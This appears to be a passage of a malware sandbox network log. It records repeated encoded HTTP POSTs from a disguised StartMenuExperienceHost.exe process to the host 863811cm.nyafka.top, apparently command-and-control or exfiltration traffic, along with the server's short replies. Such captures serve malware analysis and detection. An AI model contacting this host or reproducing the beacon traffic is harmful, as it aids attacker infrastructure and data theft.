                                                                Data Raw: 39 38 0d 0a 06 12 27 15 3d 29 2a 53 22 2d 2f 5a 2f 21 3f 01 2a 2d 3e 5e 2b 1f 06 02 24 37 23 5e 3a 3f 29 1c 36 38 23 01 28 3c 36 11 24 2c 38 02 3f 1b 2a 51 03 1b 39 12 3c 20 30 0f 3c 32 35 5c 2b 21 3a 01 26 23 35 08 2a 2d 21 56 33 58 2e 15 35 31 2b 0e 3e 05 24 0c 38 2b 23 0a 28 2b 39 02 37 11 2a 5f 08 13 39 51 29 3b 3c 55 36 37 3a 01 21 3e 24 0d 35 29 22 50 3e 07 08 57 27 33 0a 14 2f 0b 3b 00 23 2f 34 09 35 3c 31 0f 20 2e 20 10 26 28 22 5f 22 00 29 51 00 3f 54 52 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 98'=)*S"-/Z/!?*->^+$7#^:?)68#(<6$,8?*Q9< 0<25\+!:&#5*-!V3X.51+>$8+#(+97*_9Q);<U67:!>$5)"P>W'3/;#/45<1 . &("_")Q?TR0
                                                                Oct 11, 2024 01:37:52.434258938 CEST742INHTTP/1.1 200 OK
                                                                Date: Thu, 10 Oct 2024 23:37:52 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                cf-cache-status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5Im8xzRP5FsngK9LioPunXdpNmYnGPeVvJRKxcI0p%2BfsiceDhhQWY3zT1EqDqJjKJML8V1RIf2OIwe8Xh0V7CqIyKqtw7F6lsjhk%2BzvmYaobnp39WgvV0lhN4eyip84mTwDOpPCJ"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8d0a70d38a800fa9-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                Data Raw: 39 38 0d 0a 06 12 27 15 3d 29 2a 53 22 2d 2f 5a 2f 21 3f 01 2a 2d 3e 5e 2b 1f 06 02 24 37 23 5e 3a 3f 29 1c 36 38 23 01 28 3c 36 11 24 2c 38 02 3f 1b 2a 51 03 1b 39 12 3c 20 30 0f 3c 32 35 5c 2b 21 3a 01 26 23 35 08 2a 2d 21 56 33 58 2e 15 35 31 2b 0e 3e 05 24 0c 38 2b 23 0a 28 2b 39 02 37 11 2a 5f 08 13 39 51 29 3b 3c 55 36 37 3a 01 21 3e 24 0d 35 29 22 50 3e 07 08 57 27 33 0a 14 2f 0b 3b 00 23 2f 34 09 35 3c 31 0f 20 2e 20 10 26 28 22 5f 22 00 29 51 00 3f 54 52 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 98'=)*S"-/Z/!?*->^+$7#^:?)68#(<6$,8?*Q9< 0<25\+!:&#5*-!V3X.51+>$8+#(+97*_9Q);<U67:!>$5)"P>W'3/;#/45<1 . &("_")Q?TR0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                133192.168.2.550115188.114.96.3807724C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 11, 2024 01:37:51.648165941 CEST311OUTPOST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                Host: 863811cm.nyafka.top
                                                                Content-Length: 2584
                                                                Expect: 100-continue
                                                                Oct 11, 2024 01:37:52.003520966 CEST2584OUTData Raw: 50 5f 5d 5f 54 5d 58 5e 5e 5a 55 58 51 5d 5a 5d 57 5a 58 5f 55 50 51 5a 58 45 44 5c 50 5d 5f 53 5a 5e 56 55 54 5d 54 5e 5f 59 54 5a 55 57 55 52 50 53 43 5d 47 56 51 51 55 53 56 5f 55 53 5b 54 5f 56 43 47 57 5c 57 51 59 5f 5d 5e 5a 54 5e 50 51 59
                                                                Data Ascii: P_]_T]X^^ZUXQ]Z]WZX_UPQZXED\P]_SZ^VUT]T^_YTZUWURPSC]GVQQUSV_US[T_VCGW\WQY_]^ZT^PQYYQQZUAQ^X]]XU[^_FWT^[UYPZYZXAW\YURCY]QY_Z]QV[XX^PVZZTS]]V_[]]]X\UZU^W_Y^GSXYRYG\CU__QUU_V]T_ZVCWP^_X[Z:+<*2=0E(0Y")3>#?S'>-S*($G"3>;#Y$/\*
                                                                Oct 11, 2024 01:37:52.119782925 CEST25INHTTP/1.1 100 Continue
                                                                Oct 11, 2024 01:37:52.433901072 CEST601INHTTP/1.1 200 OK
                                                                Date: Thu, 10 Oct 2024 23:37:52 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                cf-cache-status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FLPHxR6kIiUjzuuuyVlCDYjXvaL71LWRfUQUcYofoli2%2Bm4gpvpIkXplkp708ZlyhUWwsgp09Tf8B7ZUeCtEP6CAwROjn8%2FEsjyrIB5BOjQn%2BReQ5jJpH5kN5BB4%2BP6XGGS%2FhLQU"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8d0a70d4792b4352-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                Data Raw: 34 0d 0a 34 5a 5e 51 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 44Z^Q0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                134192.168.2.550116188.114.96.3807724C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 11, 2024 01:37:52.544133902 CEST311OUTPOST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                Host: 863811cm.nyafka.top
                                                                Content-Length: 1980
                                                                Expect: 100-continue
                                                                Oct 11, 2024 01:37:52.894026041 CEST1980OUTData Raw: 55 59 58 58 54 5b 58 57 5e 5a 55 58 51 5d 5a 53 57 5a 58 55 55 56 51 5c 58 45 44 5c 50 5d 5f 53 5a 5e 56 55 54 5d 54 5e 5f 59 54 5a 55 57 55 52 50 53 43 5d 47 56 51 51 55 53 56 5f 55 53 5b 54 5f 56 43 47 57 5c 57 51 59 5f 5d 5e 5a 54 5e 50 51 59
                                                                Data Ascii: UYXXT[XW^ZUXQ]ZSWZXUUVQ\XED\P]_SZ^VUT]T^_YTZUWURPSC]GVQQUSV_US[T_VCGW\WQY_]^ZT^PQYYQQZUAQ^X]]XU[^_FWT^[UYPZYZXAW\YURCY]QY_Z]QV[XX^PVZZTS]]V_[]]]X\UZU^W_Y^GSXYRYG\CU__QUU_V]T_ZVCWP^_X[Z:?=(:+W%=$+5"#+067B?3=R=+8@51<=#Y$/\*
                                                                Oct 11, 2024 01:37:52.992525101 CEST25INHTTP/1.1 100 Continue
                                                                Oct 11, 2024 01:37:53.167634964 CEST744INHTTP/1.1 200 OK
                                                                Date: Thu, 10 Oct 2024 23:37:53 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                cf-cache-status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IHO9V7fRgS1Az4%2BMDFpnmkkbLAp95xYOcExifISI2gR83BkVUvTK3B4jgZKUZtU7utLBsBRXG4KKm3yyX%2BEl8BmOloklGYIlu89E03SCOXTZHdwEcwPFGZz3gXsKgDal7Vy%2Bx30h"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8d0a70d9ea998c69-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                Data Raw: 39 38 0d 0a 06 12 24 00 2a 07 08 1f 20 07 20 04 2c 21 0d 02 2b 3d 2e 15 3f 0f 2c 02 25 0a 27 5e 3a 02 25 56 21 3b 23 06 2a 2c 21 03 30 3c 01 5b 3c 31 2a 51 03 1b 3a 00 3c 55 3b 1c 28 54 35 5d 2b 22 03 17 26 33 1c 18 3d 5b 21 1d 27 2e 2d 01 21 21 0e 56 2a 3c 2b 1e 2f 15 2f 45 3d 01 2e 10 37 3b 2a 5f 08 13 39 13 3d 28 3b 0f 35 27 29 17 22 2e 24 0e 35 29 36 50 3e 00 32 50 27 0d 24 5e 2f 32 0e 58 20 3f 0e 09 36 02 2e 1d 23 3e 2b 00 26 12 22 5f 22 00 29 51 00 3f 54 52 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 98$* ,!+=.?,%'^:%V!;#*,!0<[<1*Q:<U;(T5]+"&3=[!'.-!!V*<+//E=.7;*_9=(;5')".$5)6P>2P'$^/2X ?6.#>+&"_")Q?TR0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                135192.168.2.550117188.114.96.3807724C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 11, 2024 01:37:52.555233002 CEST311OUTPOST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                Host: 863811cm.nyafka.top
                                                                Content-Length: 2584
                                                                Expect: 100-continue
                                                                Oct 11, 2024 01:37:52.909678936 CEST2584OUTData Raw: 50 5a 5d 5e 54 5e 58 5e 5e 5a 55 58 51 57 5a 5c 57 5d 58 5c 55 53 51 5b 58 45 44 5c 50 5d 5f 53 5a 5e 56 55 54 5d 54 5e 5f 59 54 5a 55 57 55 52 50 53 43 5d 47 56 51 51 55 53 56 5f 55 53 5b 54 5f 56 43 47 57 5c 57 51 59 5f 5d 5e 5a 54 5e 50 51 59
                                                                Data Ascii: PZ]^T^X^^ZUXQWZ\W]X\USQ[XED\P]_SZ^VUT]T^_YTZUWURPSC]GVQQUSV_US[T_VCGW\WQY_]^ZT^PQYYQQZUAQ^X]]XU[^_FWT^[UYPZYZXAW\YURCY]QY_Z]QV[XX^PVZZTS]]V_[]]]X\UZU^W_Y^GSXYRYG\CU__QUU_V]T_ZVCWP^_X[Z9^)=0X?\,%=;(&0_"(#) & 7?'9W)^75/)#Y$/\*)
                                                                Oct 11, 2024 01:37:52.997993946 CEST25INHTTP/1.1 100 Continue
                                                                Oct 11, 2024 01:37:53.244316101 CEST603INHTTP/1.1 200 OK
                                                                Date: Thu, 10 Oct 2024 23:37:53 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                cf-cache-status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4Mh05I%2FOXt%2FXwGEO%2FAAQ7NPo9DHDtp%2BgmEDBtTCDMxdkY9lPLrzrtWThqMexxn%2Fu5lLg9oBq%2FWdarYrT4Qh3a7yaxAvtaA8mf9LRr3G5dKh4y%2BAqTfSugUat4iwPWEmnY7kdNFky"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8d0a70d9fd995e78-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                Data Raw: 34 0d 0a 34 5a 5e 51 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 44Z^Q0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                136192.168.2.550118188.114.96.3807724C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 11, 2024 01:37:53.277287006 CEST311OUTPOST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                Host: 863811cm.nyafka.top
                                                                Content-Length: 2004
                                                                Expect: 100-continue
                                                                Oct 11, 2024 01:37:53.629060030 CEST2004OUTData Raw: 50 5a 58 5e 51 5c 58 53 5e 5a 55 58 51 56 5a 5e 57 5d 58 5e 55 55 51 53 58 45 44 5c 50 5d 5f 53 5a 5e 56 55 54 5d 54 5e 5f 59 54 5a 55 57 55 52 50 53 43 5d 47 56 51 51 55 53 56 5f 55 53 5b 54 5f 56 43 47 57 5c 57 51 59 5f 5d 5e 5a 54 5e 50 51 59
                                                                Data Ascii: PZX^Q\XS^ZUXQVZ^W]X^UUQSXED\P]_SZ^VUT]T^_YTZUWURPSC]GVQQUSV_US[T_VCGW\WQY_]^ZT^PQYYQQZUAQ^X]]XU[^_FWT^[UYPZYZXAW\YURCY]QY_Z]QV[XX^PVZZTS]]V_[]]]X\UZU^W_Y^GSXYRYG\CU__QUU_V]T_ZVCWP^_X[Z9]<.4](,'>/(%,!(3.7W3.%>; 61'*#Y$/\*-
                                                                Oct 11, 2024 01:37:53.720798969 CEST25INHTTP/1.1 100 Continue
                                                                Oct 11, 2024 01:37:53.930291891 CEST744INHTTP/1.1 200 OK
                                                                Date: Thu, 10 Oct 2024 23:37:53 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                cf-cache-status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BrpeKBA9bvYD3Mp8%2Fsssn4jZbTr4kS15NocIiHOhjnw8ESRO%2BmtfuUMdm9qfy6d5kKCGBc4PatjUmJ2awSfyKhJEHuK4tSotIlPhwdxw%2FmNWUzZqhCzQJKq14fXIWEVOrPuEk1CU"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8d0a70de793642fd-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                Data Raw: 39 38 0d 0a 06 12 27 14 3e 07 22 54 37 2d 3f 59 3b 32 33 06 3d 3e 31 07 28 08 2b 1d 25 37 23 17 2d 05 21 1e 35 05 3c 5c 29 5a 32 13 26 2c 23 1f 28 31 2a 51 03 1b 3a 02 3c 1d 2b 51 29 22 36 04 2b 0b 2e 00 26 23 3e 1c 29 2d 3d 12 27 3e 00 5e 36 08 3c 1c 29 3c 20 0b 2f 3b 05 42 2a 28 32 5a 34 01 2a 5f 08 13 39 56 29 2b 20 50 21 37 0f 14 36 03 34 0f 21 29 39 09 3f 39 31 0f 27 0a 30 5c 3b 0c 06 1d 34 2c 2f 13 21 5a 35 0b 34 03 02 5c 27 38 22 5f 22 00 29 51 00 3f 54 52 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 98'>"T7-?Y;23=>1(+%7#-!5<\)Z2&,#(1*Q:<+Q)"6+.&#>)-='>^6<)< /;B*(2Z4*_9V)+ P!764!)9?91'0\;4,/!Z54\'8"_")Q?TR0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                137192.168.2.550119188.114.96.3807724C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 11, 2024 01:37:53.363619089 CEST311OUTPOST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                Host: 863811cm.nyafka.top
                                                                Content-Length: 2584
                                                                Expect: 100-continue
                                                                Oct 11, 2024 01:37:53.722042084 CEST2584OUTData Raw: 55 59 58 5a 51 5b 58 57 5e 5a 55 58 51 56 5a 5e 57 58 58 5f 55 5c 51 5b 58 45 44 5c 50 5d 5f 53 5a 5e 56 55 54 5d 54 5e 5f 59 54 5a 55 57 55 52 50 53 43 5d 47 56 51 51 55 53 56 5f 55 53 5b 54 5f 56 43 47 57 5c 57 51 59 5f 5d 5e 5a 54 5e 50 51 59
                                                                Data Ascii: UYXZQ[XW^ZUXQVZ^WXX_U\Q[XED\P]_SZ^VUT]T^_YTZUWURPSC]GVQQUSV_US[T_VCGW\WQY_]^ZT^PQYYQQZUAQ^X]]XU[^_FWT^[UYPZYZXAW\YURCY]QY_Z]QV[XX^PVZZTS]]V_[]]]X\UZU^W_Y^GSXYRYG\CU__QUU_V]T_ZVCWP^_X[Z9Y+-/+*R2 (("('?U9U4$<'%*$",Y*;#Y$/\*-
                                                                Oct 11, 2024 01:37:53.809906960 CEST25INHTTP/1.1 100 Continue
                                                                Oct 11, 2024 01:37:54.063554049 CEST601INHTTP/1.1 200 OK
                                                                Date: Thu, 10 Oct 2024 23:37:54 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                cf-cache-status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tbruGq%2Fq%2BUs3PkLFMbBObC478KuGa0Z1hV8iuF0E4pn3ALs7%2FZlOtDTr%2Bcrro8mC2COgWK5biHoGg5ksfrIy8csZxWvXD%2FhxDHQlg7tz6Vbb69lLCZIpNgACLf%2BBFEQ23rvBUxHI"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8d0a70df0d671921-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                Data Raw: 34 0d 0a 34 5a 5e 51 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 44Z^Q0
                                                                Oct 11, 2024 01:37:54.087682962 CEST311OUTPOST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                Host: 863811cm.nyafka.top
                                                                Content-Length: 2004
                                                                Expect: 100-continue
                                                                Oct 11, 2024 01:37:54.182555914 CEST25INHTTP/1.1 100 Continue
                                                                Oct 11, 2024 01:37:54.182877064 CEST2004OUTData Raw: 55 59 58 5d 51 59 58 57 5e 5a 55 58 51 56 5a 5c 57 59 58 5b 55 56 51 53 58 45 44 5c 50 5d 5f 53 5a 5e 56 55 54 5d 54 5e 5f 59 54 5a 55 57 55 52 50 53 43 5d 47 56 51 51 55 53 56 5f 55 53 5b 54 5f 56 43 47 57 5c 57 51 59 5f 5d 5e 5a 54 5e 50 51 59
                                                                Data Ascii: UYX]QYXW^ZUXQVZ\WYX[UVQSXED\P]_SZ^VUT]T^_YTZUWURPSC]GVQQUSV_US[T_VCGW\WQY_]^ZT^PQYYQQZUAQ^X]]XU[^_FWT^[UYPZYZXAW\YURCY]QY_Z]QV[XX^PVZZTS]]V_[]]]X\UZU^W_Y^GSXYRYG\CU__QUU_V]T_ZVCWP^_X[Z9X?>*#&'*&05,<#=7'>2(8'6<_>#Y$/\*-
                                                                Oct 11, 2024 01:37:54.480030060 CEST746INHTTP/1.1 200 OK
                                                                Date: Thu, 10 Oct 2024 23:37:54 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                cf-cache-status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XzK5x%2FXWxideDqMJ3uxZFnsiXNNP%2BLofRHDafY9nBiVkpuGNpO7btuFw4LvSAhoc0KrOoDKfnVnrwPNA%2B1y2CzDfAI82AviKZPHQvFdTRyHyhrvb9RIrMDhWO09YUo%2FL3bHwHCZt"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8d0a70e15f9e1921-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                Data Raw: 39 38 0d 0a 06 12 27 5d 3e 17 08 54 37 3e 33 11 2f 0f 0a 58 3d 3d 26 59 28 31 33 58 24 27 2b 1a 39 02 35 54 36 05 06 5f 3e 3c 22 58 24 2f 3b 5b 29 31 2a 51 03 1b 3a 07 3c 33 2c 0c 2b 1c 26 06 2b 0b 25 5d 30 0a 2a 18 3e 04 36 0d 25 3e 00 5e 22 32 34 55 29 12 24 0f 2c 15 3f 0a 3e 3b 22 58 21 3b 2a 5f 08 13 39 56 28 2b 34 1c 36 19 39 5d 36 2d 30 0a 22 17 08 1b 3d 5f 22 56 30 20 24 14 3b 32 38 13 37 06 2f 57 36 3c 22 55 21 2d 27 01 32 28 22 5f 22 00 29 51 00 3f 54 52 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 98']>T7>3/X==&Y(13X$'+95T6_><"X$/;[)1*Q:<3,+&+%]0*>6%>^"24U)$,?>;"X!;*_9V(+469]6-0"=_"V0 $;287/W6<"U!-'2("_")Q?TR0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                138192.168.2.550120188.114.96.3807724C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 11, 2024 01:37:54.193643093 CEST311OUTPOST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                Host: 863811cm.nyafka.top
                                                                Content-Length: 2584
                                                                Expect: 100-continue
                                                                Oct 11, 2024 01:37:54.549845934 CEST2584OUTData Raw: 50 5e 5d 5b 51 58 58 56 5e 5a 55 58 51 53 5a 5f 57 5c 58 5a 55 50 51 53 58 45 44 5c 50 5d 5f 53 5a 5e 56 55 54 5d 54 5e 5f 59 54 5a 55 57 55 52 50 53 43 5d 47 56 51 51 55 53 56 5f 55 53 5b 54 5f 56 43 47 57 5c 57 51 59 5f 5d 5e 5a 54 5e 50 51 59
                                                                Data Ascii: P^][QXXV^ZUXQSZ_W\XZUPQSXED\P]_SZ^VUT]T^_YTZUWURPSC]GVQQUSV_US[T_VCGW\WQY_]^ZT^PQYYQQZUAQ^X]]XU[^_FWT^[UYPZYZXAW\YURCY]QY_Z]QV[XX^PVZZTS]]V_[]]]X\UZU^W_Y^GSXYRYG\CU__QUU_V]T_ZVCWP^_X[Z:)-/>9#U%>;?5?!3]+" 47V$>"*;7"/*+#Y$/\*9
                                                                Oct 11, 2024 01:37:54.671835899 CEST25INHTTP/1.1 100 Continue
                                                                Oct 11, 2024 01:37:54.922019958 CEST595INHTTP/1.1 200 OK
                                                                Date: Thu, 10 Oct 2024 23:37:54 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                cf-cache-status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Tm9lu3FzuVXwQBCRef5yjUFgTEtwnc88OPjNchn3Jz3QqscDAGyat3jzREMnwqSPNF485tAHFC%2B7SRAb6GAC0u8294ju4EqsMB90WhqcMJoU3RrOBCdAcgj%2Bx1D%2BTmhqwYo33GWp"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8d0a70e459aa78ed-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                Data Raw: 34 0d 0a 34 5a 5e 51 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 44Z^Q0
                                                                Oct 11, 2024 01:37:54.922530890 CEST310OUTPOST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                Host: 863811cm.nyafka.top
                                                                Content-Length: 540
                                                                Expect: 100-continue
                                                                Oct 11, 2024 01:37:55.022851944 CEST25INHTTP/1.1 100 Continue
                                                                Oct 11, 2024 01:37:55.023097992 CEST540OUTData Raw: 50 59 5d 59 51 59 5d 52 5e 5a 55 58 51 5c 5a 58 57 51 58 5d 55 55 51 53 58 45 44 5c 50 5d 5f 53 5a 5e 56 55 54 5d 54 5e 5f 59 54 5a 55 57 55 52 50 53 43 5d 47 56 51 51 55 53 56 5f 55 53 5b 54 5f 56 43 47 57 5c 57 51 59 5f 5d 5e 5a 54 5e 50 51 59
                                                                Data Ascii: PY]YQY]R^ZUXQ\ZXWQX]UUQSXED\P]_SZ^VUT]T^_YTZUWURPSC]GVQQUSV_US[T_VCGW\WQY_]^ZT^PQYYQQZUAQ^X]]XU[^_FWT^[UYPZYZXAW\YURCY]QY_Z]QV[XX^PVZZTS]]V_[]]]X\UZU^W_Y^GSXYRYG\CU__QUU_V]T_ZVCWP^_X[Z9Y<=<>*/T%0A<&<^#+8)0=#';$S*#"0Y)#Y$/\*
                                                                Oct 11, 2024 01:37:55.288544893 CEST592INHTTP/1.1 200 OK
                                                                Date: Thu, 10 Oct 2024 23:37:55 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                cf-cache-status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=AeLV3724Igxxcjoca%2B6Ll8yUVyhN%2FrYrmMuJI3X672sFtdjrQQTKxq2UBC7XqhF%2FM1eyrDZM4dehsvUvJ2Q39BfTTh48XrJ1m1tsn14kY%2Bld3qGKDEfQnimNMHJTcJ9sNGgRPYzZ"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8d0a70e69d0178ed-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                Data Raw: 34 0d 0a 34 5a 5e 51 0d 0a
                                                                Data Ascii: 44Z^Q
                                                                Oct 11, 2024 01:37:55.422385931 CEST5INData Raw: 30 0d 0a 0d 0a
                                                                Data Ascii: 0
                                                                Oct 11, 2024 01:37:55.423434019 CEST311OUTPOST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                Host: 863811cm.nyafka.top
                                                                Content-Length: 2584
                                                                Expect: 100-continue
                                                                Oct 11, 2024 01:37:55.524979115 CEST25INHTTP/1.1 100 Continue
                                                                Oct 11, 2024 01:37:55.529541969 CEST2584OUTData Raw: 50 53 58 58 51 5b 58 55 5e 5a 55 58 51 54 5a 5a 57 5f 58 5c 55 56 51 5b 58 45 44 5c 50 5d 5f 53 5a 5e 56 55 54 5d 54 5e 5f 59 54 5a 55 57 55 52 50 53 43 5d 47 56 51 51 55 53 56 5f 55 53 5b 54 5f 56 43 47 57 5c 57 51 59 5f 5d 5e 5a 54 5e 50 51 59
                                                                Data Ascii: PSXXQ[XU^ZUXQTZZW_X\UVQ[XED\P]_SZ^VUT]T^_YTZUWURPSC]GVQQUSV_US[T_VCGW\WQY_]^ZT^PQYYQQZUAQ^X]]XU[^_FWT^[UYPZYZXAW\YURCY]QY_Z]QV[XX^PVZZTS]]V_[]]]X\UZU^W_Y^GSXYRYG\CU__QUU_V]T_ZVCWP^_X[Z:(,Z?\8'=;(?"X+%W44Q$V=;?!!Z*#Y$/\*%
                                                                Oct 11, 2024 01:37:55.837865114 CEST599INHTTP/1.1 200 OK
                                                                Date: Thu, 10 Oct 2024 23:37:55 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                cf-cache-status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OtmtWbmg0x586YCy0mC%2FCds6DlQ0b2wBaBMN78FwOleX6c7PcoK3lJhrRTYhip9RmjnvO%2F2GImph2fJhvyX41O7gdQf%2BXyKW5BLVJbOg018%2BCcOmMsFoMJUCzpbHLghYdP6dXX%2Ba"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8d0a70e9b90d78ed-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                Data Raw: 34 0d 0a 34 5a 5e 51 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 44Z^Q0
